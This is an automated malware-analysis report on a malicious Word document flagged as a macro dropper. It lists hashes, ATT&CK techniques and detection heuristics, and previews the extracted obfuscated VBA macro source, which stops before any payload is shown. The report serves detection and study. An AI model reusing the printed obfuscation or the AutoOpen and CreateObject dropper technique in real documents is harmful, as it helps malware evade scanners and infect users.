Office (OLE) malware analysis — malicious · 37204e81ac82dab8

MALICIOUS

Office (OLE)

218.0 KB Created: 2018-06-26 15:49:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: 84217304cff787ba9632bf8ef5cd44fd SHA-1: b00b637bfc980b0b8edd186af40ff96ae90320ce SHA-256: 37204e81ac82dab8ede8d2eb310d86bcf51ea164d629d10fc15a76ed623cea9a

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing a VBA macro with an AutoOpen function, indicating it's designed to execute automatically upon opening. The macro utilizes CreateObject, a common technique for launching malicious payloads. ClamAV detection as 'Doc.Dropper.Agent-6592398-0' further confirms its malicious nature as a dropper.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6592264-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6592264-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 75857 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	75857 bytes
SHA-256: `289740d54fe7d9bebfc8c5ff3c51bba16a33bc16f24b3688f604d1c6f0dcba05`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "hePtoDo" Public Function UhyR1eb(ByRef XRhXTeFgz As String, ByVal uKn0nULZNlh As String) As String Dim UYx5rMa() As Byte Dim vG3FLs As String vG3FLs = Application.UserName Dim tiJ8nYhD As Collection Dim Zt1aBhsh As Integer While Len(vG3FLs) > 5 Zt1aBhsh = Zt1aBhsh + 5 YfhZENdtnI = Len(vG3FLs) - 8 Wend If Len(Application.UserName) < 544 Then Dim koao9Y3d7a As Collection End If If Application.UserName = "YoEynbp2Xwf" Then MsgBox ("ZYQNjEDeRo5") Else Dim y8AhvSgg43co7w As String y8AhvSgg43co7w = Application.UserName End If Dim ztK9nUX() As Byte Dim ndzgBPTA As String For AQdNeTWcrv = 0 To 5 ndzgBPTA = ndzgBPTA + "R" Next AQdNeTWcrv Dim aubWcgQl, VyQlIZD As Integer aubWcgQl = 6 + 8 For jNtB5Sdq = 0 To 8 VyQlIZD = VyQlIZD + jNtB5Sdq Next jNtB5Sdq If VyQlIZD < jNtB5Sdq Then Dim BOvWNFJGgK As Long End If For HJvaIVz0a = 0 To 9 yTLRtBiVYj = yTLRtBiVYj + HJvaIVz0a Next HJvaIVz0a Dim m703j9Z0 As Long For ty0xS7du1V = 9 To 14 m703j9Z0 = m703j9Z0 + ty0xS7du1V Next ty0xS7du1V Dim Su62XmYKi, sF5xHh5F As Integer Su62XmYKi = 5 + 7 For MfzrtB = 0 To 7 sF5xHh5F = sF5xHh5F + MfzrtB Next MfzrtB If sF5xHh5F < MfzrtB Then Dim XOwLHRFaO As Long End If For HUM5pip3W = 0 To 8 ri7ICXo = ri7ICXo + HUM5pip3W Next HUM5pip3W Dim asuhtuxFwb As Long Dim OpaQyIagv As Long For YL6DGWLG = 5 To 16 OpaQyIagv = OpaQyIagv + YL6DGWLG Next YL6DGWLG Dim pAZxd3 As String pAZxd3 = Application.UserName Dim yTzxkTy As Collection Dim rMfi6B1y As Integer While Len(pAZxd3) > 7 rMfi6B1y = rMfi6B1y + 8 y1Lj5x8p = Len(pAZxd3) - 9 Wend If Len(Application.UserName) < 529 Then Dim cvS7mUv As Collection End If Dim MmNN3C78fxq As Long For NR1Z94 = 0 To 5 SrubKFY = SrubKFY + NR1Z94 Next NR1Z94 Dim SC6GEwR7zw, Rv7ktg As Integer SC6GEwR7zw = 8 + 6 For K3RWTRyt = 0 To 8 Rv7ktg = Rv7ktg + K3RWTRyt Next K3RWTRyt If Rv7ktg < K3RWTRyt Then Dim Mvlhc7Q As Long End If Dim YJiw4S, zlj7LlE As Integer YJiw4S = 5 + 7 For T4yUIahNyl = 0 To 5 zlj7LlE = zlj7LlE + T4yUIahNyl Next T4yUIahNyl If zlj7LlE < T4yUIahNyl Then Dim iInNV5xfGs As Long End If For OFgRZ7OF5 = 0 To 9 RtIFbirS3 = RtIFbirS3 + OFgRZ7OF5 Next OFgRZ7OF5 If Application.UserName = "tvdu3clFTHP" Then MsgBox ("GMDbeubUsS5") Else Dim fozEMKEyxSe01r As String fozEMKEyxSe01r = Application.UserName End If If Application.UserName = "gct3QAyRQsc" Then MsgBox ("KlXDU9WNu1K") Else Dim aK09H9wjble5aH As String aK09H9wjble5aH = Application.UserName End If If Application.UserName = "P7iiyVxYZGT" Then MsgBox ("OoBgoAUPy1s") Else Dim G5Tn8EUGYr3X91 As String G5Tn8EUGYr3X91 = Application.UserName End If Dim jRWtctAx As Long Dim Keb5MrSrw, NLLaqjxaST As Integer Keb5MrSrw = 8 + 8 For Urib0TN3c = 0 To 8 NLLaqjxaST = NLLaqjxaST + Urib0TN3c Next Urib0TN3c If NLLaqjxaST < Urib0TN3c Then Dim siwjUD8QE As Long End If If Application.UserName = "MhJTbuP1h6H" Then MsgBox ("OYr1N8vP7WO") Else Dim h2PmB9HQpeRVrv As String h2PmB9HQpeRVrv = Application.UserName End If If Len(Application.UserName) < 771 Then Dim tb7RPdj As Collection End If If Len(Application.UserName) < 978 Then Dim C8NmLJnt As Collection End If If Len(Application.UserName) < 494 Then Dim ZYgo7Xm As Collection End If If Application.UserName = "Ou9Yf5v8VTb" Then MsgBox ("HGiJBHQauln") Else Dim Hg7HK1UbTRYfh7 As String Hg7HK1UbTRYfh7 = Application.UserName End If If Len(Application.UserName) < 515 Then Dim dHeQytue As Collection End If Dim vnWPwZbUi As Long Dim t1bDwI As String For aO4tYyO = 0 To 5 t1bDwI = t1bDwI + "Y" Next aO4tYyO Dim Gys9U3R As String For nDFgN7R = 0 To 5 Gys9U3R = Gys9U3R + "z" Next nDFgN7R Dim UTNXCQ56mQ As String For agPRaA = 0 To 9 UTNXCQ56mQ = UTNXCQ56mQ + "W" Next agPRaA If Application.UserName = "q2zPQszwOib" Then Ms ... (truncated)

SHA-256: 289740d54fe7d9bebfc8c5ff3c51bba16a33bc16f24b3688f604d1c6f0dcba05

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "hePtoDo"
Public Function UhyR1eb(ByRef XRhXTeFgz As String, ByVal uKn0nULZNlh As String) As String
Dim UYx5rMa() As Byte
Dim vG3FLs As String
vG3FLs = Application.UserName
Dim tiJ8nYhD As Collection
Dim Zt1aBhsh As Integer
While Len(vG3FLs) > 5
Zt1aBhsh = Zt1aBhsh + 5
YfhZENdtnI = Len(vG3FLs) - 8
Wend
If Len(Application.UserName) < 544 Then
Dim koao9Y3d7a As Collection
End If
If Application.UserName = "YoEynbp2Xwf" Then
MsgBox ("ZYQNjEDeRo5")
Else
Dim y8AhvSgg43co7w As String
y8AhvSgg43co7w = Application.UserName
End If
Dim ztK9nUX() As Byte
Dim ndzgBPTA As String
For AQdNeTWcrv = 0 To 5
ndzgBPTA = ndzgBPTA + "R"
Next AQdNeTWcrv
Dim aubWcgQl, VyQlIZD As Integer
aubWcgQl = 6 + 8
For jNtB5Sdq = 0 To 8
VyQlIZD = VyQlIZD + jNtB5Sdq
Next jNtB5Sdq
If VyQlIZD < jNtB5Sdq Then
Dim BOvWNFJGgK As Long
End If
For HJvaIVz0a = 0 To 9
yTLRtBiVYj = yTLRtBiVYj + HJvaIVz0a
Next HJvaIVz0a
Dim m703j9Z0 As Long
For ty0xS7du1V = 9 To 14
m703j9Z0 = m703j9Z0 + ty0xS7du1V
Next ty0xS7du1V
Dim Su62XmYKi, sF5xHh5F As Integer
Su62XmYKi = 5 + 7
For MfzrtB = 0 To 7
sF5xHh5F = sF5xHh5F + MfzrtB
Next MfzrtB
If sF5xHh5F < MfzrtB Then
Dim XOwLHRFaO As Long
End If
For HUM5pip3W = 0 To 8
ri7ICXo = ri7ICXo + HUM5pip3W
Next HUM5pip3W
Dim asuhtuxFwb As Long
Dim OpaQyIagv As Long
For YL6DGWLG = 5 To 16
OpaQyIagv = OpaQyIagv + YL6DGWLG
Next YL6DGWLG
Dim pAZxd3 As String
pAZxd3 = Application.UserName
Dim yTzxkTy As Collection
Dim rMfi6B1y As Integer
While Len(pAZxd3) > 7
rMfi6B1y = rMfi6B1y + 8
y1Lj5x8p = Len(pAZxd3) - 9
Wend
If Len(Application.UserName) < 529 Then
Dim cvS7mUv As Collection
End If
Dim MmNN3C78fxq As Long
For NR1Z94 = 0 To 5
SrubKFY = SrubKFY + NR1Z94
Next NR1Z94
Dim SC6GEwR7zw, Rv7ktg As Integer
SC6GEwR7zw = 8 + 6
For K3RWTRyt = 0 To 8
Rv7ktg = Rv7ktg + K3RWTRyt
Next K3RWTRyt
If Rv7ktg < K3RWTRyt Then
Dim Mvlhc7Q As Long
End If
Dim YJiw4S, zlj7LlE As Integer
YJiw4S = 5 + 7
For T4yUIahNyl = 0 To 5
zlj7LlE = zlj7LlE + T4yUIahNyl
Next T4yUIahNyl
If zlj7LlE < T4yUIahNyl Then
Dim iInNV5xfGs As Long
End If
For OFgRZ7OF5 = 0 To 9
RtIFbirS3 = RtIFbirS3 + OFgRZ7OF5
Next OFgRZ7OF5
If Application.UserName = "tvdu3clFTHP" Then
MsgBox ("GMDbeubUsS5")
Else
Dim fozEMKEyxSe01r As String
fozEMKEyxSe01r = Application.UserName
End If
If Application.UserName = "gct3QAyRQsc" Then
MsgBox ("KlXDU9WNu1K")
Else
Dim aK09H9wjble5aH As String
aK09H9wjble5aH = Application.UserName
End If
If Application.UserName = "P7iiyVxYZGT" Then
MsgBox ("OoBgoAUPy1s")
Else
Dim G5Tn8EUGYr3X91 As String
G5Tn8EUGYr3X91 = Application.UserName
End If
Dim jRWtctAx As Long
Dim Keb5MrSrw, NLLaqjxaST As Integer
Keb5MrSrw = 8 + 8
For Urib0TN3c = 0 To 8
NLLaqjxaST = NLLaqjxaST + Urib0TN3c
Next Urib0TN3c
If NLLaqjxaST < Urib0TN3c Then
Dim siwjUD8QE As Long
End If
If Application.UserName = "MhJTbuP1h6H" Then
MsgBox ("OYr1N8vP7WO")
Else
Dim h2PmB9HQpeRVrv As String
h2PmB9HQpeRVrv = Application.UserName
End If
If Len(Application.UserName) < 771 Then
Dim tb7RPdj As Collection
End If
If Len(Application.UserName) < 978 Then
Dim C8NmLJnt As Collection
End If
If Len(Application.UserName) < 494 Then
Dim ZYgo7Xm As Collection
End If
If Application.UserName = "Ou9Yf5v8VTb" Then
MsgBox ("HGiJBHQauln")
Else
Dim Hg7HK1UbTRYfh7 As String
Hg7HK1UbTRYfh7 = Application.UserName
End If
If Len(Application.UserName) < 515 Then
Dim dHeQytue As Collection
End If
Dim vnWPwZbUi As Long
Dim t1bDwI As String
For aO4tYyO = 0 To 5
t1bDwI = t1bDwI + "Y"
Next aO4tYyO
Dim Gys9U3R As String
For nDFgN7R = 0 To 5
Gys9U3R = Gys9U3R + "z"
Next nDFgN7R
Dim UTNXCQ56mQ As String
For agPRaA = 0 To 9
UTNXCQ56mQ = UTNXCQ56mQ + "W"
Next agPRaA
If Application.UserName = "q2zPQszwOib" Then
Ms
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.